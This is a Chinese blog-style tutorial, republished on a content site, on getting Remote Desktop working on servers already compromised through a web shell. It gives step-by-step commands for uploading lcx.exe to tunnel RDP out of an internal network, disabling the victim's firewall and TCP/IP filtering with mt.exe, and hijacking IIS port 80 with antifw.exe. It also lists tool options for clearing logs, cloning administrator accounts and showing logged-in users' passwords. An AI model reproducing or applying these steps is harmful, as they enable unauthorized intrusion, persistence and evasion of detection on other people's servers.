开了3389后WEB渗透远程连接不上的分析与解决

荼蘼降临丶58

荼蘼降临丶58

2016-02-20 08:58

只要你有一台电脑或者手机,都能关注图老师为大家精心推荐的开了3389后WEB渗透远程连接不上的分析与解决,手机电脑控们准备好了吗?一起看过来吧!

对于开了3389,连接不上,有几个方面的原因,我来总结下,哇咔咔,这几天提好几台服务器都TM这样,分析下,

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/diannaorumen/)

原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。

好了,知道原因了,我们来一个一个思考解决方法(部分引用):

远程桌面端口被更改解决方法:

现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(TerminalService)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。

对方服务器处于内网解决方法:

这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度lcx。exe下载,我就不提供下载了。

使用方法:

1。上传lcx。exe到目标服务器可执行目录

2。本地主机启动lcx。exe监听,命令:

lcx。exe-listen19884567//监听1988端口并转发到4567端口

在目标主机运行:

格式为:

lcx。exe-slave你的IP你监听的端口肉机IP要转发的目标主机端口

例子:lcx。exe-slave192。168。86。11988192。168。86。33389

3。本地链接:127。0。0。1:1988

OK,有点小麻烦,不过还是很管用的,要是你也是内网,你就做下端口映射就好了,映射到转发回来的端口,哇咔咔。

4、防火墙拦截解决办法:

一般还是先试试端口转发,还是利用LCX,

使用方法:

lcx。exe-slave你的IP你监听的端口肉机要转发的目标主机端口

例子:lcx。exe-slave192。168。86。11988192。168。86。33389

然后本地连接:127。0。0。1:1988就搞定了。

如果还不行。。要是web是SYSTEM权限,直接停掉防火墙服务就没问题了。

5、TCP/IP安全策略限制。

这个解决方法就有点多了,可以使用MT。EXE来关闭策略,

使用方法:

1。上传mt。exe到目标服务器可执行目录

2。执行命令:mt。exe-filteroff

这样就关闭了TCP/IP限制了

选项:

-filter更改TCP/IP过滤器的开头状态

-addport添加端口到过滤器的允许列表

-setport设置端口作为过滤器的允许列表

-nicinfo列出TCP/IP界面信息

-pslist列出活动进程

-pskill杀毒指定进程

-dlllist列出指定进程的DLL

-sysinfo列出系统信息

-shutdown关闭系统

-reboot重启系统

-poweroff关闭电源

-logoff注销当前用户会话

-chkts检查终端服务信息

-setupts安装终端服务

-remts卸载终端服务

-chgtsp重置终端服务端口

-clog清除系统日志

-enumsrv列出所有服务

-querysrv列出指定服务的详细信息

-instsrv安装一个服务

-cfgsrv更改服务配置

-remsrv卸载指定服务

-startsrv启动指定服务

-stopsrv停止指定服务

-netget从http/ftp下载

-redirect端口重定向

-chkuser列出所有账户、sid和anti克隆

-clone克隆admin到目标

-never设置账户看上去从未登录

-killuser删除账户,甚至是guest也可删除

-su以Local_System权限运行进程

-findpass显示所有已登录用户的口令

-netstat列出TCP连接

-killtcp杀死TCP连接

-psport映射端口到进程

-touch设置文件日期和时间到指定值

-secdel安全擦除文件或目录占用的空间

-regshell进入一个控制台注册表编辑器

-chkdll检测ginadll后门

上面只是一种方法,再说一种好用的方法吧,成功率灰常高,哇咔咔。

使用antifw。exe这个工具,

使用方法:

在cmd下输入

antifw-s运行程序停止iis将3389改为80

antifw-l关闭程序。恢复iis

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/diannaorumen/)

连接的时候直接连接他的80端口就OK了,内网外网通杀!成功率比较高。但是这样他网站就访问不了。。。

没事,上去了我们赶紧分析原因,排除万难,把限制去掉,再给他还原80端口,哇咔咔。。。

展开更多 50%)
分享

猜你喜欢

开了3389后WEB渗透远程连接不上的分析与解决

电脑入门
开了3389后WEB渗透远程连接不上的分析与解决

QQ远程协助连接成功后花屏解决

电脑网络
QQ远程协助连接成功后花屏解决

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

Win10待机唤醒待机后wifi连接不上的解决方法

电脑入门
Win10待机唤醒待机后wifi连接不上的解决方法

MySQL的远程连接出现错误提示分析

Linux Linux命令 Linux安装 Linux编程 Linux桌面 Linux软件 Linux内核 Linux管理
MySQL的远程连接出现错误提示分析

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

手机与电脑连接不上怎么办

手机 电脑
手机与电脑连接不上怎么办

Apple Watch与iPhone连接不上怎么办

iphone iPhone 5s iPhone 6 iphone刷机
Apple Watch与iPhone连接不上怎么办

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

笔记本夏天如何散热效果好?

笔记本夏天如何散热效果好?

让Windows7实现3D切换页面效果的3种方法

让Windows7实现3D切换页面效果的3种方法
下拉加载更多内容 ↓